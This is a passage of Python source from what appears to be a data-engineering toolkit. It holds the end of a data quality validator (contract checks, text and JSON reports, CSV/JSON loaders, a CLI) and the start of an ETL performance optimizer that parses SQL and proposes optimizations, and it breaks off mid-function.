expected_type = col_def.get('type', col_def.get('data_type', 'string'))
values = [row.get(col_name) for row in data]
non_null = [str(v) for v in values if v is not None and v != '']
if non_null:
detected_type = TypeDetector.detect_type(non_null[:1000])
type_compatible = self._types_compatible(detected_type, expected_type)
if not type_compatible:
results.append(ValidationResult(
check_name="contract_data_type",
column=col_name,
passed=False,
expected=expected_type,
actual=detected_type,
severity="error",
message=f"Contract expects type '{expected_type}' but detected '{detected_type}'"
))
# Check nullable
if not col_def.get('nullable', True):
null_count = sum(1 for v in values if v is None or v == '')
if null_count > 0:
results.append(ValidationResult(
check_name="contract_not_null",
column=col_name,
passed=False,
expected="no nulls",
actual=f"{null_count} nulls",
severity="error",
message=f"Contract requires non-null but found {null_count} nulls"
))
# Validate SLA section
if 'sla' in contract:
sla = contract['sla']
# Row count bounds
min_rows = sla.get('min_rows', sla.get('minimum_records'))
max_rows = sla.get('max_rows', sla.get('maximum_records'))
row_count = len(data)
if min_rows and row_count < min_rows:
results.append(ValidationResult(
check_name="contract_min_rows",
column=None,
passed=False,
expected=f">= {min_rows} rows",
actual=f"{row_count} rows",
severity="error",
message=f"Contract requires at least {min_rows} rows"
))
if max_rows and row_count > max_rows:
results.append(ValidationResult(
check_name="contract_max_rows",
column=None,
passed=False,
expected=f"<= {max_rows} rows",
actual=f"{row_count} rows",
severity="warning",
message=f"Contract allows at most {max_rows} rows"
))
return results
def _types_compatible(self, detected: str, expected: str) -> bool:
"""Check if detected type is compatible with expected type"""
expected = expected.lower()
detected = detected.lower()
type_groups = {
'numeric': ['integer', 'int', 'float', 'double', 'decimal', 'number'],
'string': ['string', 'varchar', 'char', 'text'],
'boolean': ['boolean', 'bool'],
'date': ['date', 'date_iso'],
'datetime': ['datetime', 'datetime_iso', 'timestamp'],
}
for group, types in type_groups.items():
if expected in types and detected in types:
return True
return detected == expected
# =============================================================================
# Report Generator
# =============================================================================
class ReportGenerator:
"""Generate validation reports"""
def generate_text_report(self,
profile: DataProfile,
results: List[ValidationResult],
score: QualityScore) -> str:
"""Generate a text report"""
lines = []
lines.append("=" * 80)
lines.append("DATA QUALITY VALIDATION REPORT")
lines.append("=" * 80)
lines.append(f"\nDataset: {profile.name}")
lines.append(f"Generated: {datetime.now().isoformat()}")
lines.append(f"Rows: {profile.row_count:,}")
lines.append(f"Columns: {profile.column_count}")
lines.append(f"Duplicate Rows: {profile.duplicate_rows:,}")
# Quality Score
lines.append("\n" + "-" * 40)
lines.append("QUALITY SCORES")
lines.append("-" * 40)
lines.append(f" Overall: {score.overall:>6.1f}% {'✓' if score.overall >= 80 else '✗'}")
lines.append(f" Completeness: {score.completeness:>6.1f}%")
lines.append(f" Uniqueness: {score.uniqueness:>6.1f}%")
lines.append(f" Validity: {score.validity:>6.1f}%")
lines.append(f" Consistency: {score.consistency:>6.1f}%")
lines.append(f" Accuracy: {score.accuracy:>6.1f}%")
# Validation Results Summary
passed = sum(1 for r in results if r.passed)
failed = len(results) - passed
errors = sum(1 for r in results if not r.passed and r.severity == "error")
warnings = sum(1 for r in results if not r.passed and r.severity == "warning")
lines.append("\n" + "-" * 40)
lines.append("VALIDATION SUMMARY")
lines.append("-" * 40)
lines.append(f" Total Checks: {len(results)}")
lines.append(f" Passed: {passed} ✓")
lines.append(f" Failed: {failed} ✗")
lines.append(f" Errors: {errors}")
lines.append(f" Warnings: {warnings}")
# Failed checks details
if failed > 0:
lines.append("\n" + "-" * 40)
lines.append("FAILED CHECKS")
lines.append("-" * 40)
for r in results:
if not r.passed:
severity_icon = "❌" if r.severity == "error" else "⚠️"
col_str = f"[{r.column}]" if r.column else ""
lines.append(f"\n{severity_icon} {r.check_name} {col_str}")
lines.append(f" Expected: {r.expected}")
lines.append(f" Actual: {r.actual}")
if r.message:
lines.append(f" Message: {r.message}")
# Column profiles
lines.append("\n" + "-" * 40)
lines.append("COLUMN PROFILES")
lines.append("-" * 40)
for col in profile.columns:
lines.append(f"\n {col.name}")
lines.append(f" Type: {col.data_type}")
lines.append(f" Nulls: {col.null_count:,} ({col.null_percentage:.1f}%)")
lines.append(f" Unique: {col.unique_count:,} ({col.unique_percentage:.1f}%)")
if col.min_value is not None:
lines.append(f" Range: [{col.min_value:.2f}, {col.max_value:.2f}]")
lines.append(f" Mean: {col.mean:.2f}, Median: {col.median:.2f}")
if col.min_length is not None:
lines.append(f" Length: [{col.min_length}, {col.max_length}] (avg: {col.avg_length:.1f})")
if col.detected_pattern:
lines.append(f" Pattern: {col.detected_pattern}")
if col.top_values:
top_3 = col.top_values[:3]
lines.append(f" Top values: {', '.join(f'{v[0]} ({v[1]})' for v in top_3)}")
lines.append("\n" + "=" * 80)
return "\n".join(lines)
def generate_json_report(self,
profile: DataProfile,
results: List[ValidationResult],
score: QualityScore) -> Dict:
"""Generate a JSON report"""
return {
"report_type": "data_quality_validation",
"generated_at": datetime.now().isoformat(),
"dataset": {
"name": profile.name,
"row_count": profile.row_count,
"column_count": profile.column_count,
"duplicate_rows": profile.duplicate_rows,
"memory_bytes": profile.memory_size_bytes
},
"quality_score": asdict(score),
"validation_summary": {
"total_checks": len(results),
"passed": sum(1 for r in results if r.passed),
"failed": sum(1 for r in results if not r.passed),
"errors": sum(1 for r in results if not r.passed and r.severity == "error"),
"warnings": sum(1 for r in results if not r.passed and r.severity == "warning")
},
"validation_results": [
{
"check": r.check_name,
"column": r.column,
"passed": r.passed,
"severity": r.severity,
"expected": str(r.expected),
"actual": str(r.actual),
"message": r.message
}
for r in results
],
"column_profiles": [asdict(c) for c in profile.columns]
}
# =============================================================================
# Data Loader
# =============================================================================
class DataLoader:
"""Load data from various formats"""
@staticmethod
def load(file_path: str) -> List[Dict]:
"""Load data from file"""
path = Path(file_path)
if not path.exists():
raise FileNotFoundError(f"File not found: {file_path}")
suffix = path.suffix.lower()
if suffix == '.csv':
return DataLoader._load_csv(file_path)
elif suffix == '.json':
return DataLoader._load_json(file_path)
elif suffix == '.jsonl':
return DataLoader._load_jsonl(file_path)
else:
raise ValueError(f"Unsupported file format: {suffix}")
@staticmethod
def _load_csv(file_path: str) -> List[Dict]:
"""Load CSV file"""
data = []
with open(file_path, 'r', newline='', encoding='utf-8') as f:
reader = csv.DictReader(f)
for row in reader:
data.append(dict(row))
return data
@staticmethod
def _load_json(file_path: str) -> List[Dict]:
"""Load JSON file"""
with open(file_path, 'r', encoding='utf-8') as f:
content = json.load(f)
if isinstance(content, list):
return content
elif isinstance(content, dict):
# Check for common data keys
for key in ['data', 'records', 'rows', 'items']:
if key in content and isinstance(content[key], list):
return content[key]
return [content]
else:
raise ValueError("JSON must contain array or object with data key")
@staticmethod
def _load_jsonl(file_path: str) -> List[Dict]:
"""Load JSON Lines file"""
data = []
with open(file_path, 'r', encoding='utf-8') as f:
for line in f:
line = line.strip()
if line:
data.append(json.loads(line))
return data
# =============================================================================
# Schema Loader
# =============================================================================
class SchemaLoader:
"""Load schema definitions"""
@staticmethod
def load(file_path: str) -> DataSchema:
"""Load schema from JSON file"""
with open(file_path, 'r', encoding='utf-8') as f:
schema_dict = json.load(f)
columns = []
for col_def in schema_dict.get('columns', []):
columns.append(ColumnSchema(
name=col_def['name'],
data_type=col_def.get('type', col_def.get('data_type', 'string')),
nullable=col_def.get('nullable', True),
unique=col_def.get('unique', False),
min_value=col_def.get('min_value'),
max_value=col_def.get('max_value'),
min_length=col_def.get('min_length'),
max_length=col_def.get('max_length'),
pattern=col_def.get('pattern'),
allowed_values=col_def.get('allowed_values'),
description=col_def.get('description', '')
))
return DataSchema(
name=schema_dict.get('name', 'unknown'),
version=schema_dict.get('version', '1.0'),
columns=columns,
primary_key=schema_dict.get('primary_key'),
row_count_min=schema_dict.get('row_count_min'),
row_count_max=schema_dict.get('row_count_max')
)
# =============================================================================
# CLI Interface
# =============================================================================
def cmd_validate(args):
"""Run validation against schema"""
logger.info(f"Loading data from {args.input}")
data = DataLoader.load(args.input)
results = []
if args.schema:
logger.info(f"Loading schema from {args.schema}")
schema = SchemaLoader.load(args.schema)
validator = SchemaValidator()
results = validator.validate(data, schema)
if args.detect_anomalies:
logger.info("Running anomaly detection")
anomaly_detector = AnomalyDetector()
anomaly_results = anomaly_detector.validate(data)
results.extend(anomaly_results)
# Profile data
profiler = DataProfiler()
profile = profiler.profile(data, name=Path(args.input).stem)
# Calculate score
score_calc = QualityScoreCalculator()
score = score_calc.calculate(profile, results)
# Generate report
reporter = ReportGenerator()
if args.json:
report = reporter.generate_json_report(profile, results, score)
output = json.dumps(report, indent=2)
else:
output = reporter.generate_text_report(profile, results, score)
if args.output:
with open(args.output, 'w') as f:
f.write(output)
logger.info(f"Report saved to {args.output}")
else:
print(output)
# Exit with error if validation failed
errors = sum(1 for r in results if not r.passed and r.severity == "error")
if errors > 0:
sys.exit(1)
def cmd_profile(args):
"""Generate data profile"""
logger.info(f"Loading data from {args.input}")
data = DataLoader.load(args.input)
profiler = DataProfiler()
profile = profiler.profile(data, name=Path(args.input).stem)
if args.json or args.output:
output = json.dumps(asdict(profile), indent=2, default=str)
else:
# Text output
lines = []
lines.append(f"Dataset: {profile.name}")
lines.append(f"Rows: {profile.row_count:,}")
lines.append(f"Columns: {profile.column_count}")
lines.append(f"Duplicate rows: {profile.duplicate_rows:,}")
lines.append(f"\nColumn Profiles:")
for col in profile.columns:
lines.append(f"\n {col.name} ({col.data_type})")
lines.append(f" Nulls: {col.null_percentage:.1f}%")
lines.append(f" Unique: {col.unique_percentage:.1f}%")
if col.mean is not None:
lines.append(f" Stats: min={col.min_value}, max={col.max_value}, mean={col.mean:.2f}")
output = "\n".join(lines)
if args.output:
with open(args.output, 'w') as f:
f.write(output)
logger.info(f"Profile saved to {args.output}")
else:
print(output)
def cmd_generate_suite(args):
"""Generate Great Expectations suite"""
logger.info(f"Loading data from {args.input}")
data = DataLoader.load(args.input)
# Profile first
profiler = DataProfiler()
profile = profiler.profile(data, name=Path(args.input).stem)
# Generate suite
generator = GreatExpectationsGenerator()
suite = generator.generate_suite(profile)
output = json.dumps(suite, indent=2)
if args.output:
with open(args.output, 'w') as f:
f.write(output)
logger.info(f"Expectation suite saved to {args.output}")
else:
print(output)
def cmd_contract(args):
"""Validate against data contract"""
logger.info(f"Loading data from {args.input}")
data = DataLoader.load(args.input)
logger.info(f"Loading contract from {args.contract}")
contract_validator = DataContractValidator()
contract = contract_validator.load_contract(args.contract)
results = contract_validator.validate_contract(data, contract)
# Profile data
profiler = DataProfiler()
profile = profiler.profile(data, name=Path(args.input).stem)
# Calculate score
score_calc = QualityScoreCalculator()
score = score_calc.calculate(profile, results)
# Generate report
reporter = ReportGenerator()
if args.json:
report = reporter.generate_json_report(profile, results, score)
output = json.dumps(report, indent=2)
else:
output = reporter.generate_text_report(profile, results, score)
if args.output:
with open(args.output, 'w') as f:
f.write(output)
logger.info(f"Report saved to {args.output}")
else:
print(output)
# Exit with error if contract validation failed
errors = sum(1 for r in results if not r.passed and r.severity == "error")
if errors > 0:
sys.exit(1)
def cmd_schema(args):
"""Generate schema from data"""
logger.info(f"Loading data from {args.input}")
data = DataLoader.load(args.input)
if not data:
logger.error("Empty dataset")
sys.exit(1)
# Profile to detect types
profiler = DataProfiler()
profile = profiler.profile(data, name=Path(args.input).stem)
# Generate schema
schema = {
"name": profile.name,
"version": "1.0",
"columns": []
}
for col in profile.columns:
col_schema = {
"name": col.name,
"type": col.data_type,
"nullable": col.null_percentage > 0,
"description": ""
}
if col.unique_percentage > 99:
col_schema["unique"] = True
if col.min_value is not None:
col_schema["min_value"] = col.min_value
col_schema["max_value"] = col.max_value
if col.min_length is not None:
col_schema["min_length"] = col.min_length
col_schema["max_length"] = col.max_length
if col.detected_pattern:
col_schema["pattern"] = col.detected_pattern
# Add allowed values for low-cardinality columns
if col.unique_count <= 20 and col.unique_percentage < 10:
col_schema["allowed_values"] = [v[0] for v in col.top_values]
schema["columns"].append(col_schema)
output = json.dumps(schema, indent=2)
if args.output:
with open(args.output, 'w') as f:
f.write(output)
logger.info(f"Schema saved to {args.output}")
else:
print(output)
def main():
"""Main entry point"""
parser = argparse.ArgumentParser(
description="Data Quality Validator - Comprehensive data quality validation",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
Examples:
# Validate data against schema
python data_quality_validator.py validate data.csv --schema schema.json
# Profile data
python data_quality_validator.py profile data.csv --output profile.json
# Generate Great Expectations suite
python data_quality_validator.py generate-suite data.csv --output expectations.json
# Validate against data contract
python data_quality_validator.py contract data.csv --contract contract.yaml
# Generate schema from data
python data_quality_validator.py schema data.csv --output schema.json
"""
)
parser.add_argument('--verbose', '-v', action='store_true', help='Verbose output')
subparsers = parser.add_subparsers(dest='command', help='Command to run')
# Validate command
validate_parser = subparsers.add_parser('validate', help='Validate data against schema')
validate_parser.add_argument('input', help='Input data file (CSV, JSON, JSONL)')
validate_parser.add_argument('--schema', '-s', help='Schema file (JSON)')
validate_parser.add_argument('--output', '-o', help='Output report file')
validate_parser.add_argument('--json', action='store_true', help='Output as JSON')
validate_parser.add_argument('--detect-anomalies', action='store_true', help='Detect statistical anomalies')
validate_parser.set_defaults(func=cmd_validate)
# Profile command
profile_parser = subparsers.add_parser('profile', help='Generate data profile')
profile_parser.add_argument('input', help='Input data file')
profile_parser.add_argument('--output', '-o', help='Output profile file')
profile_parser.add_argument('--json', action='store_true', help='Output as JSON')
profile_parser.set_defaults(func=cmd_profile)
# Generate suite command
suite_parser = subparsers.add_parser('generate-suite', help='Generate Great Expectations suite')
suite_parser.add_argument('input', help='Input data file')
suite_parser.add_argument('--output', '-o', help='Output expectations file')
suite_parser.set_defaults(func=cmd_generate_suite)
# Contract command
contract_parser = subparsers.add_parser('contract', help='Validate against data contract')
contract_parser.add_argument('input', help='Input data file')
contract_parser.add_argument('--contract', '-c', required=True, help='Data contract file (YAML or JSON)')
contract_parser.add_argument('--output', '-o', help='Output report file')
contract_parser.add_argument('--json', action='store_true', help='Output as JSON')
contract_parser.set_defaults(func=cmd_contract)
# Schema command
schema_parser = subparsers.add_parser('schema', help='Generate schema from data')
schema_parser.add_argument('input', help='Input data file')
schema_parser.add_argument('--output', '-o', help='Output schema file')
schema_parser.set_defaults(func=cmd_schema)
args = parser.parse_args()
if args.verbose:
logging.getLogger().setLevel(logging.DEBUG)
if not args.command:
parser.print_help()
sys.exit(1)
try:
args.func(args)
except Exception as e:
logger.error(f"Error: {e}")
if args.verbose:
import traceback
traceback.print_exc()
sys.exit(1)
if __name__ == '__main__':
main()
FILE:scripts/etl_performance_optimizer.py
#!/usr/bin/env python3
"""
ETL Performance Optimizer
Comprehensive ETL/ELT performance analysis and optimization tool.
Features:
- SQL query analysis and optimization recommendations
- Spark job configuration analysis
- Data skew detection and mitigation
- Partition strategy recommendations
- Join optimization suggestions
- Memory and shuffle analysis
- Cost estimation for cloud warehouses
Usage:
python etl_performance_optimizer.py analyze-sql query.sql
python etl_performance_optimizer.py analyze-spark spark-history.json
python etl_performance_optimizer.py optimize-partition data_stats.json
python etl_performance_optimizer.py estimate-cost query.sql --warehouse snowflake
"""
import os
import sys
import json
import re
import argparse
import logging
import math
from pathlib import Path
from typing import Dict, List, Optional, Any, Tuple, Set
from dataclasses import dataclass, field, asdict
from datetime import datetime
from collections import defaultdict
from abc import ABC, abstractmethod
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s - %(levelname)s - %(message)s'
)
logger = logging.getLogger(__name__)
# =============================================================================
# Data Classes
# =============================================================================
@dataclass
class SQLQueryInfo:
"""Parsed information about a SQL query"""
query_type: str # SELECT, INSERT, UPDATE, DELETE, MERGE, CREATE
tables: List[str]
columns: List[str]
joins: List[Dict[str, str]]
where_conditions: List[str]
group_by: List[str]
order_by: List[str]
aggregations: List[str]
subqueries: int
distinct: bool
limit: Optional[int]
ctes: List[str]
window_functions: List[str]
estimated_complexity: str # low, medium, high, very_high
@dataclass
class OptimizationRecommendation:
"""A single optimization recommendation"""
category: str # index, partition, join, filter, aggregation, memory, shuffle
severity: str # critical, high, medium, low
title: str
description: str
current_issue: str
recommendation: str
expected_improvement: str
implementation: str
priority: int = 1
@dataclass
class SparkJobMetrics:
"""Metrics from a Spark job"""
job_id: str
duration_ms: int
stages: int
tasks: int
shuffle_read_bytes: int
shuffle_write_bytes: int
input_bytes: int
output_bytes: int
peak_memory_bytes: int
gc_time_ms: int
failed_tasks: int
speculative_tasks: int
skew_ratio: float # max_task_time / median_task_time
@dataclass
class PartitionStrategy:
"""Recommended partition strategy"""
column: str
partition_type: str # range, hash, list
num_partitions: Optional[int]
partition_size_mb: float
reasoning: str
implementation: str
@dataclass
class CostEstimate:
"""Cost estimate for a query"""
warehouse: str
compute_cost: float
storage_cost: float
data_transfer_cost: float
total_cost: float
currency: str = "USD"
assumptions: List[str] = field(default_factory=list)
# =============================================================================
# SQL Parser
# =============================================================================
class SQLParser:
"""Parse and analyze SQL queries"""
# Common SQL patterns
PATTERNS = {
'select': re.compile(r'\bSELECT\b', re.IGNORECASE),
'from': re.compile(r'\bFROM\b', re.IGNORECASE),
'join': re.compile(r'\b(INNER|LEFT|RIGHT|FULL|CROSS)?\s*JOIN\b', re.IGNORECASE),
'where': re.compile(r'\bWHERE\b', re.IGNORECASE),
'group_by': re.compile(r'\bGROUP\s+BY\b', re.IGNORECASE),
'order_by': re.compile(r'\bORDER\s+BY\b', re.IGNORECASE),
'having': re.compile(r'\bHAVING\b', re.IGNORECASE),
'distinct': re.compile(r'\bDISTINCT\b', re.IGNORECASE),
'limit': re.compile(r'\bLIMIT\s+(\d+)', re.IGNORECASE),
'cte': re.compile(r'\bWITH\b', re.IGNORECASE),
'subquery': re.compile(r'\(\s*SELECT\b', re.IGNORECASE),
'window': re.compile(r'\bOVER\s*\(', re.IGNORECASE),
'aggregation': re.compile(r'\b(COUNT|SUM|AVG|MIN|MAX|STDDEV|VARIANCE)\s*\(', re.IGNORECASE),
'insert': re.compile(r'\bINSERT\s+INTO\b', re.IGNORECASE),
'update': re.compile(r'\bUPDATE\b', re.IGNORECASE),
'delete': re.compile(r'\bDELETE\s+FROM\b', re.IGNORECASE),
'merge': re.compile(r'\bMERGE\s+INTO\b', re.IGNORECASE),
'create': re.compile(r'\bCREATE\s+(TABLE|VIEW|INDEX)\b', re.IGNORECASE),
}
def parse(self, sql: str) -> SQLQueryInfo:
"""Parse a SQL query and extract information"""
# Clean up the query
sql = self._clean_sql(sql)
# Determine query type
query_type = self._detect_query_type(sql)
# Extract tables
tables = self._extract_tables(sql)
# Extract columns (for SELECT queries)
columns = self._extract_columns(sql) if query_type == 'SELECT' else []
# Extract joins
joins = self._extract_joins(sql)
# Extract WHERE conditions
where_conditions = self._extract_where_conditions(sql)
# Extract GROUP BY
group_by = self._extract_group_by(sql)
# Extract ORDER BY
order_by = self._extract_order_by(sql)
# Extract aggregations
aggregations = self._extract_aggregations(sql)
# Count subqueries
subqueries = len(self.PATTERNS['subquery'].findall(sql))
# Check for DISTINCT
distinct = bool(self.PATTERNS['distinct'].search(sql))
# Extract LIMIT
limit_match = self.PATTERNS['limit'].search(sql)
limit = int(limit_match.group(1)) if limit_match else None
# Extract CTEs
ctes = self._extract_ctes(sql)
# Extract window functions
window_functions = self._extract_window_functions(sql)
# Estimate complexity
complexity = self._estimate_complexity(
tables, joins, subqueries, aggregations, window_functions
)
return SQLQueryInfo(
query_type=query_type,
tables=tables,
columns=columns,
joins=joins,
where_conditions=where_conditions,
group_by=group_by,
order_by=order_by,
aggregations=aggregations,
subqueries=subqueries,
distinct=distinct,
limit=limit,
ctes=ctes,
window_functions=window_functions,
estimated_complexity=complexity
)
def _clean_sql(self, sql: str) -> str:
"""Clean and normalize SQL"""
# Remove comments
sql = re.sub(r'--.*$', '', sql, flags=re.MULTILINE)
sql = re.sub(r'/\*.*?\*/', '', sql, flags=re.DOTALL)
# Normalize whitespace
sql = ' '.join(sql.split())
return sql
def _detect_query_type(self, sql: str) -> str:
"""Detect the type of SQL query"""
sql_upper = sql.upper().strip()
if sql_upper.startswith('WITH') or sql_upper.startswith('SELECT'):
return 'SELECT'
elif self.PATTERNS['insert'].search(sql):
return 'INSERT'
elif self.PATTERNS['update'].search(sql):
return 'UPDATE'
elif self.PATTERNS['delete'].search(sql):
return 'DELETE'
elif self.PATTERNS['merge'].search(sql):
return 'MERGE'
elif self.PATTERNS['create'].search(sql):
return 'CREATE'
else:
return 'UNKNOWN'
def _extract_tables(self, sql: str) -> List[str]:
"""Extract table names from SQL"""
tables = []
# FROM clause tables
from_pattern = re.compile(
r'\bFROM\s+([a-zA-Z_][a-zA-Z0-9_]*(?:\.[a-zA-Z_][a-zA-Z0-9_]*)?)',
re.IGNORECASE
)
tables.extend(from_pattern.findall(sql))
# JOIN clause tables
join_pattern = re.compile(
r'\bJOIN\s+([a-zA-Z_][a-zA-Z0-9_]*(?:\.[a-zA-Z_][a-zA-Z0-9_]*)?)',
re.IGNORECASE
)
tables.extend(join_pattern.findall(sql))
# INSERT INTO table
insert_pattern = re.compile(
r'\bINSERT\s+INTO\s+([a-zA-Z_][a-zA-Z0-9_]*(?:\.[a-zA-Z_][a-zA-Z0-9_]*)?)',
re.IGNORECASE
)
tables.extend(insert_pattern.findall(sql))
# UPDATE table
update_pattern = re.compile(
r'\bUPDATE\s+([a-zA-Z_][a-zA-Z0-9_]*(?:\.[a-zA-Z_][a-zA-Z0-9_]*)?)',
re.IGNORECASE
)
tables.extend(update_pattern.findall(sql))
return list(set(tables))
def _extract_columns(self, sql: str) -> List[str]:
"""Extract column references from SELECT clause"""
# Find SELECT ... FROM
match = re.search(r'\bSELECT\s+(.*?)\s+FROM\b', sql, re.IGNORECASE | re.DOTALL)
if not match:
return []
select_clause = match.group(1)
# Handle SELECT *
if '*' in select_clause and 'COUNT(*)' not in select_clause.upper():
return ['*']
# Extract column names (simplified)
columns = []
for part in select_clause.split(','):
part = part.strip()
# Handle aliases
alias_match = re.search(r'\bAS\s+(\w+)\s*$', part, re.IGNORECASE)
if alias_match:
columns.append(alias_match.group(1))
else:
# Get the last identifier
col_match = re.search(r'([a-zA-Z_][a-zA-Z0-9_]*)(?:\s*$|\s+AS\b)', part, re.IGNORECASE)
if col_match:
columns.append(col_match.group(1))
return columns
def _extract_joins(self, sql: str) -> List[Dict[str, str]]:
"""Extract join information"""
joins = []
join_pattern = re.compile(
r'\b(INNER|LEFT\s+OUTER?|RIGHT\s+OUTER?|FULL\s+OUTER?|CROSS)?\s*JOIN\s+'
r'([a-zA-Z_][a-zA-Z0-9_.]*)\s*(?:AS\s+)?(\w+)?\s*'
r'(?:ON\s+(.+?))?(?=\s+(?:INNER|LEFT|RIGHT|FULL|CROSS|WHERE|GROUP|ORDER|HAVING|LIMIT|$))',
re.IGNORECASE | re.DOTALL
)
for match in join_pattern.finditer(sql):
join_type = match.group(1) or 'INNER'
table = match.group(2)
alias = match.group(3)
condition = match.group(4)
joins.append({
'type': join_type.strip().upper(),
'table': table,
'alias': alias,
'condition': condition.strip() if condition else None
})
return joins
def _extract_where_conditions(self, sql: str) -> List[str]:
"""Extract WHERE clause conditions"""
# Find WHERE ... (GROUP BY | ORDER BY | HAVING | LIMIT | end)
match = re.search(
r'\bWHERE\s+(.*?)(?=\s+(?:GROUP\s+BY|ORDER\s+BY|HAVING|LIMIT)|$)',
sql, re.IGNORECASE | re.DOTALL
)
if not match:
return []
where_clause = match.group(1).strip()
# Split by AND/OR (simplified)
conditions = re.split(r'\s+AND\s+|\s+OR\s+', where_clause, flags=re.IGNORECASE)
return [c.strip() for c in conditions if c.strip()]
def _extract_group_by(self, sql: str) -> List[str]:
"""Extract GROUP BY columns"""
match = re.search(
r'\bGROUP\s+BY\s+(.*?)(?=\s+(?:HAVING|ORDER\s+BY|LIMIT)|$)',
sql, re.IGNORECASE | re.DOTALL
)
if not match:
return []
group_clause = match.group(1).strip()
columns = [c.strip() for c in group_clause.split(',')]
return columns
def _extract_order_by(self, sql: str) -> List[str]:
"""Extract ORDER BY columns"""
match = re.search(
r'\bORDER\s+BY\s+(.*?)(?=\s+LIMIT|$)',
sql, re.IGNORECASE | re.DOTALL
)
if not match:
return []
order_clause = match.group(1).strip()
columns = [c.strip() for c in order_clause.split(',')]
return columns
def _extract_aggregations(self, sql: str) -> List[str]:
"""Extract aggregation functions used"""
agg_pattern = re.compile(
r'\b(COUNT|SUM|AVG|MIN|MAX|STDDEV|VARIANCE|MEDIAN|PERCENTILE_CONT|PERCENTILE_DISC)\s*\(',
re.IGNORECASE
)
return list(set(m.upper() for m in agg_pattern.findall(sql)))
def _extract_ctes(self, sql: str) -> List[str]:
"""Extract CTE names"""
cte_pattern = re.compile(
r'\bWITH\s+(\w+)\s+AS\s*\(|,\s*(\w+)\s+AS\s*\(',
re.IGNORECASE
)
ctes = []
for match in cte_pattern.finditer(sql):
cte_name = match.group(1) or match.group(2)
if cte_name:
ctes.append(cte_name)
return ctes
def _extract_window_functions(self, sql: str) -> List[str]:
"""Extract window function patterns"""
window_pattern = re.compile(
r'\b(\w+)\s*\([^)]*\)\s+OVER\s*\(',
re.IGNORECASE
)
return list(set(m.upper() for m in window_pattern.findall(sql)))
def _estimate_complexity(self, tables: List[str], joins: List[Dict],
subqueries: int, aggregations: List[str],
window_functions: List[str]) -> str:
"""Estimate query complexity"""
score = 0
# Table count
score += len(tables) * 10
# Join count and types
for join in joins:
if join['type'] in ('CROSS', 'FULL OUTER'):
score += 30
elif join['type'] in ('LEFT OUTER', 'RIGHT OUTER'):
score += 20
else:
score += 15
# Subqueries
score += subqueries * 25
# Aggregations
score += len(aggregations) * 5
# Window functions
score += len(window_functions) * 15
if score < 30:
return 'low'
elif score < 60:
return 'medium'
elif score < 100:
return 'high'
else:
return 'very_high'
# =============================================================================
# SQL Optimizer
# =============================================================================
class SQLOptimizer:
"""Analyze SQL queries and provide optimization recommendations"""
def analyze(self, query_info: SQLQueryInfo, sql: str) -> List[OptimizationRecommendation]:
"""Analyze a SQL query and generate optimization recommendations"""
recommendations = []
# Check for SELECT *
if '*' in query_info.columns:
recommendations.append(self._recommend_explicit_columns())
# Check for missing WHERE clause on large tables
if not query_info.where_conditions and query_info.tables:
recommendations.append(self._recommend_add_filters())
# Check for inefficient joins
join_recs = self._analyze_joins(query_info)
recommendations.extend(join_recs)
# Check for DISTINCT usage
if query_info.distinct:
recommendations.append(self._recommend_distinct_alternative())
# Check for ORDER BY without LIMIT
if query_info.order_by and not query_info.limit:
recommendations.append(self._recommend_add_limit())
# Check for subquery optimization
if query_info.subqueries > 0:
recommendations.append(self._recommend_cte_conversion())
# Check for index opportunities
index_recs = self._analyze_index_opportunities(query_info)
recommendations.extend(index_recs)
# Check for partition pruning
partition_recs = self._analyze_partition_pruning(query_info, sql)
recommendations.extend(partition_recs)
# Check for aggregation optimization
if query_info.aggregations and query_info.group_by:
agg_recs = self._analyze_aggregation(query_info)
recommendations.extend(agg_recs)
# Sort by priority
recommendations.sort(key=lambda r: r.priority)
return recommendations
def _recommend_explicit_columns(self) -> OptimizationRecommendation:
return OptimizationRecommendation(
category="query_structure",
severity="medium",
title="Avoid SELECT *",
description="Using SELECT * retrieves all columns, increasing I/O and memory usage.",
current_issue="Query uses SELECT * which fetches unnecessary columns",
recommendation="Specify only the columns you need",
expected_improvement="10-50% reduction in data scanned depending on table width",
implementation="Replace SELECT * with SELECT col1, col2, col3 ...",
priority=2
)
def _recommend_add_filters(self) -> OptimizationRecommendation:
return OptimizationRecommendation(
category="filter",
severity="high",
title="Add WHERE Clause Filters",
description="Query scans entire tables without filtering, causing full table scans.",
current_issue="No WHERE clause filters found - full table scan required",
recommendation="Add appropriate WHERE conditions to filter data early",
expected_improvement="Up to 90%+ reduction in data processed if highly selective",
implementation="Add WHERE column = value or WHERE date_column >= '2024-01-01'",
priority=1
)
def _analyze_joins(self, query_info: SQLQueryInfo) -> List[OptimizationRecommendation]:
"""Analyze joins for optimization opportunities"""
recommendations = []
for join in query_info.joins:
# Check for CROSS JOIN
if join['type'] == 'CROSS':
recommendations.append(OptimizationRecommendation(
category="join",
severity="critical",
title="Avoid CROSS JOIN",
description="CROSS JOIN creates a Cartesian product, which can explode data volume.",
current_issue=f"CROSS JOIN with table {join['table']} detected",
recommendation="Replace with appropriate INNER/LEFT JOIN with ON condition",
expected_improvement="Exponential reduction in intermediate data",
implementation=f"Convert CROSS JOIN {join['table']} to INNER JOIN {join['table']} ON ...",
priority=1
))
# Check for missing join condition
if not join.get('condition'):
recommendations.append(OptimizationRecommendation(
category="join",
severity="high",
title="Missing Join Condition",
description="Join without explicit ON condition may cause Cartesian product.",
current_issue=f"JOIN with {join['table']} has no explicit ON condition",
recommendation="Add explicit ON condition to the join",
expected_improvement="Prevents accidental Cartesian products",
implementation=f"Add ON {join['table']}.id = other_table.foreign_key",
priority=1
))
# Check for many joins
if len(query_info.joins) > 5:
recommendations.append(OptimizationRecommendation(
category="join",
severity="medium",
title="High Number of Joins",
description="Many joins can lead to complex execution plans and performance issues.",
current_issue=f"{len(query_info.joins)} joins detected in single query",
recommendation="Consider breaking into smaller queries or pre-aggregating",
expected_improvement="Better plan optimization and memory usage",
implementation="Use CTEs to materialize intermediate results, or denormalize frequently joined data",
priority=3
))
return recommendations
def _recommend_distinct_alternative(self) -> OptimizationRecommendation:
return OptimizationRecommendation(
category="query_structure",
severity="medium",
title="Consider Alternatives to DISTINCT",
description="DISTINCT requires sorting/hashing all rows which can be expensive.",
current_issue="DISTINCT used - may indicate data quality or join issues",
recommendation="Review if DISTINCT is necessary or if joins produce duplicates",
expected_improvement="Eliminates expensive deduplication step if not needed",
implementation="Review join conditions, or use GROUP BY if aggregating anyway",
priority=3
)
def _recommend_add_limit(self) -> OptimizationRecommendation:
return OptimizationRecommendation(
category="query_structure",
severity="low",
